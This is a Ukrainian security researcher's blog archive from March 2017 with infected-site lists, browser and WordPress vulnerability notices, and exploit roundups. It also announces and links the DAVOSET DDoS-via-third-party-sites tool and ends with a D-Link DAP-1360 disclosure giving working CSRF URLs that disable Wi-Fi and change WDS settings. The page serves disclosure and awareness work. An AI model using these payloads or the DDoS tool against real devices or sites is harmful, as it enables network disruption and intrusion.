Архів за Березень, 2017

Моє інтерв’ю медіа-порталу “Культура”

19:10 29.03.2017

У лютому я дав інтерв’ю медіа-порталу “Культура”. І 14.03.2017 воно вийшло в журналі та було оприлюднене на сайті.

В інтерв’ю розповідається про мою трирічну діяльність та про кібер війну Росії проти України. А також про громадську ініціативу Українські Кібер Війська, що я створив 09.06.2014, і протидію інформаційній та кібер війні.

Кібервійна: український сектор оборони

Так що кому буде цікаво прочитати інформацію про кібер війну, про мене і УКВ, як тим хто вже читав мої попередні інтерв’ю, зокрема інтерв’ю для Сегодня, чи дивився виступи на ТБ, зокрема на каналі 1+1, так і всім іншим, можете прочитати це інтерв’ю.

Добірка уразливостей

16:22 29.03.2017

В даній добірці уразливості в веб додатках:

Інфіковані сайти №268

22:45 28.03.2017

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://vasha-mebel.kiev.ua - інфекція була виявлена 27.02.2017. Зараз сайт входить до переліку підозрілих.
  • http://stena.uz.ua - інфекція була виявлена 27.02.2017. Зараз сайт не входить до переліку підозрілих.
  • http://silentkeylogger.com - інфекція була виявлена 27.02.2017. Зараз сайт входить до переліку підозрілих.
  • http://mediapoltava.com.ua - інфекція була виявлена 27.02.2017. Зараз сайт не входить до переліку підозрілих.
  • http://add.in.ua - інфікований державний сайт - інфекція була виявлена 27.02.2017. Зараз сайт входить до переліку підозрілих.
  • http://aionritual.com.ua - інфекція була виявлена 28.03.2017. Зараз сайт не входить до переліку підозрілих.
  • http://ups.dn.ua - інфекція була виявлена 28.03.2017. Зараз сайт входить до переліку підозрілих.
  • http://michaniki-ukraine.com - інфекція була виявлена 28.03.2017. Зараз сайт не входить до переліку підозрілих.
  • http://e-expo.com.ua - інфекція була виявлена 28.03.2017. Зараз сайт входить до переліку підозрілих.
  • http://kondi.kiev.ua - інфекція була виявлена 28.03.2017. Зараз сайт не входить до переліку підозрілих.

Численні уразливості в Microsoft Internet Explorer і Edge

19:36 28.03.2017

Виявлені численні уразливості безпеки в Microsoft Internet Explorer і Microsoft Edge.

Уразливі продукти: Microsoft Internet Explorer 9, 10, 11 та Edge під Windows Vista, Windows Server 2008, Windows 7, Windows Server 2012, Windows 8.1, Windows 10, Windows Server 2016.

Численні пошкодження пам’яті та виконання коду.

  • Microsoft Security Bulletin MS17-006 - Critical Cumulative Security Update for Internet Explorer (4013073) (деталі)
  • Microsoft Security Bulletin MS17-007 - Critical Cumulative Security Update for Microsoft Edge (4013071) (деталі)

Мій виступ на каналі 1+1

15:21 28.03.2017

У березні, 08.03.2017, я знявся для сюжету на каналі 1+1.

Сюжет вийшов 09.03.2017 в програмі “Секретні матеріали” на телеканалі 1+1. Де розповідається як в Україні заарештували кіберзлочинця мережі Avalanche, деталі цієї справи, інтерв’ю від мене та хакерів з Українського Кіберальянсу (UCA).

Уразливості в плагінах для WordPress №246

23:55 04.03.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Recent Backups, WPTF Image Gallery, Avenir-Soft Direct Download, Bookmarkify та в WordPress. Для котрих з’явилися експлоіти.

  • WordPress Recent Backups 0.7 File Download (деталі)
  • WordPress WPTF Image Gallery 1.03 File Download (деталі)
  • WordPress 3.8.1 / 3.8.2 / 4.2.2 Cross Site Request Forgery (деталі)
  • WordPress Avenir-Soft Direct Download 1.0 XSS / CSRF (деталі)
  • WordPress Bookmarkify 2.9.2 Cross Site Request Forgery / Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

DDoS attacks via other sites execution tool

22:46 04.03.2017

В березні, 09.03.2017, вийшла нова версія програми DAVOSET v.1.3. В новій версії:

  • Розширив підтримку SSRF і додав підтримку XXE уразливості в SAP NetWeaver AS.
  • Додав нові сервіси в повний список зомбі.
  • Прибрав неробочі сервіси з повного списку зомбі.

Всього в списку міститься 170 зомбі-сервісів.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality та XML External Entities уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.3.rar.

Численні уразливості в Mozilla Firefox і Thunderbird

20:01 04.03.2017

Виявлені численні уразливості безпеки в Mozilla Firefox і Thunderbird.

Уразливі продукти: Mozilla Firefox 51, Firefox ESR 45.7, Thunderbird 45.7.

Пошкодження пам’яті, обхід обмежень, вибивання, підробка адресного рядку, витік інформації, видалення довільних файлів на комп’ютері, підробка Print preview, DoS атаки на браузер, подібні до тих, про які я писав багато років тому.

  • MFSA 2017-05 Security vulnerabilities fixed in Firefox 52 (деталі)

Добірка експлоітів

17:28 04.03.2017

В даній добірці експлоіти в веб додатках:

  • GSX Analyzer 10.12 / 11 - ‘main.swf’ Hard-Coded Superadmin Credentials (деталі)
  • Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure (деталі)
  • Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting (деталі)
  • Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (деталі)
  • Iris ID IrisAccess iCAM4000/iCAM7000 - Hard-Coded Credentials Remote Shell Access (деталі)

PRL і CSRF уразливості в D-Link DAP-1360

23:52 03.03.2017

Продовжуючи тему уразливостей в D-Link DAP-1360. У січні, 27.01.2016, я виявив нові уразливості в пристрої. Це Predictable Resource Location та Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

Predictable Resource Location (WASC-34):

Якщо використовувати D-Link DAP-1360 в якості роутера, до можливий доступ до адмінки за адресою http://dlink.ap. Дана адреса застосовується в різних пристроях D-Link з функцією роутера. Це полегшує CSRF та XSS атаки - всі, про які писав в цій та попередніх публікаціях. Бо зміна IP вже не захистить і можна віддалено проводити CSRF атаки використовуючи ім’я домену.

CSRF (WASC-09):

Зокрема можна вимкнути Wi-Fi. При цьому зміна IP з дефолтного 192.168.0.50 на іншій не допоможе.

http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

CSRF (WASC-09):

В розділі Wi-Fi - WDS можна змінити параметр WDS Mode:

Вимкнути - Disable:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}

Увімкнути - Bridge mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Увімкнути - Repeater mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.